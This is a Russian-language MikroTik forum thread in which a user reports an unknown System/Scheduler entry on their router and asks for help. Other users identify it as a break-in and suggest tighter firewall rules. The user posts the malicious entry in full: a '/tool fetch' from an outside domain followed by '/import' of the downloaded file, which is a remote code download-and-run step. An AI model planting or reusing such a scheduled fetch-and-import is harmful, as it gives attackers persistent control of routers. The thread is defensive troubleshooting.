Неизвестная запись в System/Scheduler

Автоматизация при помощи встроенного скриптового языка и RouterOS API
Аватара пользователя
r136a8
Сообщения: 135
Зарегистрирован: 04 дек 2017, 00:01

Неизвестная запись в System/Scheduler

Сообщение r136a8 » 02 фев 2019, 23:30

Добрый вечер. Сегодня настраивал отправку уведемлениий об появлении новой прошивки в telegram и обнаружил неизвестную запись в System/Scheduler

Код: Выделить всё

/tool fetch url=http://ciskotik.com/poll/4e24192a-ecb2-4a45-81bd-b0fb225410e5 mode=http dst-path=7xe7zt46hb08
/import 7xe7zt46hb08
https://imgur.com/a/NUUdwFq
Что это может быть?

Аватара пользователя
Sir_Prikol
Сообщения: 273
Зарегистрирован: 14 апр 2018, 15:21
Откуда: СССР
Контактная информация:

Re: Неизвестная запись в System/Scheduler

Сообщение Sir_Prikol » 03 фев 2019, 16:09

Взлом, или кто-то пошутил
Проверяем юзеров, порты, фаер....
Дома:
Uplink - RB3011UiAS (2-ISP(ethernet)белый IP),RB SXT LTE 3-7 (резерв yota (белый IP),Wireless Wire Dish (RBLHGG-60adkit) Uplink белый IP.
2 x RB2011UiAS-2HnD, 2 x RBmAP2nD, 1 x RBwAPG-5HacT2HnD
Хочу uplink - RB1100AHx4 или CCR1036-12G-4S

Аватара пользователя
r136a8
Сообщения: 135
Зарегистрирован: 04 дек 2017, 00:01

Re: Неизвестная запись в System/Scheduler

Сообщение r136a8 » 03 фев 2019, 18:05

Sir_Prikol писал(а):
03 фев 2019, 16:09
Взлом, или кто-то пошутил
Проверяем юзеров, порты, фаер....
Какой выход из таких ситуаций, правильный. Нужно заново перенас ;) троить роутер? Или всего лишь удалить запись, но не известно ещё что-то может быть. И как защитится от подобного в будущем?

Аватара пользователя
Sir_Prikol
Сообщения: 273
Зарегистрирован: 14 апр 2018, 15:21
Откуда: СССР
Контактная информация:

Re: Неизвестная запись в System/Scheduler

Сообщение Sir_Prikol » 03 фев 2019, 18:38

Правильный - настройка фаервола, ограничения юзеров, запрет портов...
Дома:
Uplink - RB3011UiAS (2-ISP(ethernet)белый IP),RB SXT LTE 3-7 (резерв yota (белый IP),Wireless Wire Dish (RBLHGG-60adkit) Uplink белый IP.
2 x RB2011UiAS-2HnD, 2 x RBmAP2nD, 1 x RBwAPG-5HacT2HnD
Хочу uplink - RB1100AHx4 или CCR1036-12G-4S

Аватара пользователя
r136a8
Сообщения: 135
Зарегистрирован: 04 дек 2017, 00:01

Re: Неизвестная запись в System/Scheduler

Сообщение r136a8 » 03 фев 2019, 19:19

Sir_Prikol писал(а):
03 фев 2019, 18:38
Правильный - настройка фаервола, ограничения юзеров, запрет портов...
Мои настройки firewall filter, закрыты все порты кроме тех которые нужны для PPTP.

Код: Выделить всё

/ip firewall filter
add action=accept chain=input connection-state=established,related
add action=accept chain=input comment=bestpratice dst-port=23023 protocol=tcp
add action=accept chain=forward in-interface=bridge1-NET-V out-interface=\
    bridge2-NET-E
add action=accept chain=forward in-interface=bridge2-NET-E out-interface=\
    bridge1-NET-V
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
    ether9-WAN-E protocol=tcp
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
    ether1-WAN-V protocol=tcp
add action=accept chain=input comment="Open PPTP" in-interface=ether1-WAN-V \
    protocol=gre
add action=accept chain=input comment="Open PPTP" in-interface=ether9-WAN-E \
    protocol=gre
add action=drop chain=input comment="Close all ports" in-interface=\
    ether9-WAN-E
add action=drop chain=input comment="Close all ports" in-interface=\
    ether1-WAN-V
Что можете посоветовать для firewall filter, по возможности дайте командную строку
Я нашел в сети вот нашел стандартные правила

Код: Выделить всё

/ip firewall filter
add action=accept chain=input comment="Allow PING (ICMP)" protocol=icmp
add action=accept chain=input comment="defconf: accept established,related" connection-state=established,related
add action=drop chain=input comment="defconf: drop all from WAN" in-interface=ether1
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" connection-state=established,related routing-mark=main
add action=accept chain=forward comment="defconf: accept established,related" connection-state=established,related
add action=drop chain=forward comment="defconf: drop invalid" connection-state=invalid
add action=drop chain=forward comment="defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat connection-state=new in-interface=ether1
Сеть домашняя, юзеров как таковых нет, несколько пк через кабель и несколько устройств через cAP.
в настройках сети wifi
1) использую WPA2-PSK с aes-ccm шифрованием.
2) отключен WPS.
3) пароль 16 символов: большая буква, малая и цыфры
4) ограничен доступ по MAC-адресам в WiFi-сети.
5) снята галочка Default Forward в настройках wifi интерфейсах
6) скрыт SSID сети.
8) изменен MAC беспроводного интерфейса
что еще сделать?

Аватара пользователя
Chupaka
Сообщения: 1857
Зарегистрирован: 29 фев 2016, 15:26
Откуда: Минск
Контактная информация:

Re: Неизвестная запись в System/Scheduler

Сообщение Chupaka » 03 фев 2019, 19:27

Определённо взлом :) https://forum.nag.ru/index.php?/topic/1 ... -na-vzlom/

Доступ в Интернет — IPoE, безо всяких тоннелей? Что у вас за бриджи там? Интерфейсы ether1,9 в них не входят?

Более жёсткий вариант защиты, чем ваш — разрешить то, что нужно, а затем дропнуть вообще всё (независимо от интерфейсов и другого).

Аватара пользователя
r136a8
Сообщения: 135
Зарегистрирован: 04 дек 2017, 00:01

Re: Неизвестная запись в System/Scheduler

Сообщение r136a8 » 03 фев 2019, 19:39

Да доступ по IPoE в оба порта
ether1 кабель от модема провайдера
ether9 кабель напрямую от провайдера.
Есть только PPTP на постоянной основе подключен один пк для использования VPN viewtopic.php?f=2&t=1938&p=4403#p4403

Относительно бриджей
Два бриджа на две сети/провайдера ether1,9 в них не входят!
https://imgur.com/a/eiaBAgM
Я думал что я полностью закрыт, по крайней мере Вы так мне говорили :)

Аватара пользователя
Chupaka
Сообщения: 1857
Зарегистрирован: 29 фев 2016, 15:26
Откуда: Минск
Контактная информация:

Re: Неизвестная запись в System/Scheduler

Сообщение Chupaka » 04 фев 2019, 12:27

PPTP — ещё один аплинк, по сути? На нём, как вижу, ничего не блокируется.

И вы самую главную ссылку забыли — после слов "вы так мне говорили" :)

Аватара пользователя
r136a8
Сообщения: 135
Зарегистрирован: 04 дек 2017, 00:01

Re: Неизвестная запись в System/Scheduler

Сообщение r136a8 » 04 фев 2019, 12:34

Chupaka писал(а):
04 фев 2019, 12:27
PPTP — ещё один аплинк, по сути? На нём, как вижу, ничего не блокируется.

И вы самую главную ссылку забыли — после слов "вы так мне говорили" :)
PPTP — предполагаю, что да.
Помогите пожалуйста побороть это и не допустить в будующем. Вчера перенастроил роутер с нуля чтобы исключить чужие записи и сделал копию. Отправил Вам в личку полную конфигурацию роутера.
Извените не сильно понял, о чем Вы!

Аватара пользователя
Chupaka
Сообщения: 1857
Зарегистрирован: 29 фев 2016, 15:26
Откуда: Минск
Контактная информация:

Re: Неизвестная запись в System/Scheduler

Сообщение Chupaka » 04 фев 2019, 13:06

r136a8 писал(а):
04 фев 2019, 12:34
PPTP — предполагаю, что да.
Помогите пожалуйста побороть это и не допустить в будующем.
Я выше написал, как побороть:
Chupaka писал(а):
03 фев 2019, 19:27
разрешить то, что нужно, а затем дропнуть вообще всё (независимо от интерфейсов и другого).

r136a8 писал(а):
04 фев 2019, 12:34
Извените не сильно понял, о чем Вы!
О том месте, где я так говорил :)

Ответить